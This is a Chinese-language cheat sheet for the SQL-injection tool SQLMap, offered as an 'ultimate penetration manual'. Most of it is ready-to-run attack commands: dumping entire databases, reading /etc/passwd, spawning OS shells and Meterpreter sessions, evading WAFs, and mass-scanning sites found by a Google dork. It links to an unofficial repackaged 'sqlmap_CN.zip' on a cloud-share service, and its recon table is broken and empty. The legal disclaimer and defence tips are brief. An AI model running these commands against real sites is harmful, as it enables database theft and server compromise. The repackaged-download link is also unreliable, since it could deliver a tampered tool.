SQLMap 终极渗透手册(2025全功能版)
目录
⚠️ 法律声明
工具下载
🔍 基础侦查
📂 数据枚举
层级式渗透
批量操作
🛠️ 高级功能
1. 权限提升
2. 系统命令执行
3. 绕过WAF
🎯 实战场景
场景1:Cookie注入
场景2:POST注入
场景3:谷歌黑客批量检测
📊 结果管理
⚡ 效率优化
⚠️ 防护建议
⚠️ 法律声明
所有技术仅限授权测试使用!未经授权渗透属于违法行为。
工具下载
我用夸克网盘给你分享了「sqlmap_CN.zip」,点击链接或复制整段内容,打开「夸克APP」即可获取。
/~339038pE3e~:/
链接:https://pan.quark.cn/s/0d3faddb83b2
🔍 基础侦查
| 命令 | 功能 | 示例 |
|
| 基础检测 |
|
|
| 当前数据库用户 |
|
|
| 当前数据库 |
|
|
| 列出所有数据库 |
|
📂 数据枚举
层级式渗透
# 1. 获取数据库
sqlmap -u "http://test.com/news?id=1" --dbs# 2. 获取表
sqlmap -u "http://test.com/news?id=1" --tables -D "数据库名"# 3. 获取字段
sqlmap -u "http://test.com/news?id=1" --columns -T "表名" -D "数据库名"# 4. 导出数据
sqlmap -u "http://test.com/news?id=1" --dump -C "字段名" -T "表名" -D "数据库名"批量操作
# 导出整个数据库
sqlmap -u "http://test.com/news?id=1" --dump-all --exclude-sysdbs# 导出指定范围数据
sqlmap -u "http://test.com/news?id=1" --dump -T "users" -D "app_db" --start=1 --stop=100🛠️ 高级功能
1. 权限提升
# 检测是否为DBA
sqlmap -u "url" --is-dba# 获取系统文件(需要高权限)
sqlmap -u "url" --file-read="/etc/passwd"2. 系统命令执行
# 执行单条命令
sqlmap -u "url" --os-cmd="whoami"# 获取交互式Shell
sqlmap -u "url" --os-shell# 获取Meterpreter会话(需Metasploit)
sqlmap -u "url" --os-pwn --msf-path=/opt/metasploit3. 绕过WAF
# 使用TAMPER脚本
sqlmap -u "url" --tamper="space2comment"# 设置延迟
sqlmap -u "url" --delay=3# 随机UA
sqlmap -u "url" --random-agent🎯 实战场景
场景1:Cookie注入
sqlmap -u "http://test.com/login" --cookie="PHPSESSID=1234" --level=3场景2:POST注入
sqlmap -u "http://test.com/login" --data="username=admin&password=123"场景3:谷歌黑客批量检测
sqlmap -g "inurl:.php?id=" --batch --smart📊 结果管理
# 保存进度
sqlmap -u "url" --output-dir=/root/sqlmap_results# 恢复进度
sqlmap --resume -l /root/sqlmap_results/log⚡ 效率优化
# 多线程扫描
sqlmap -u "url" --threads=5# 仅检测不攻击
sqlmap -u "url" --dbs --batch --smart⚠️ 防护建议
- 使用参数化查询
- 最小化数据库权限
- 部署WAF防护
💡 提示:
- 使用
-v 3查看详细过程 - 复杂环境下添加
--flush-session清除缓存 - 首次测试建议从
--level=1 --risk=1开始
👉 按需组合命令参数,注意操作风险! 🚀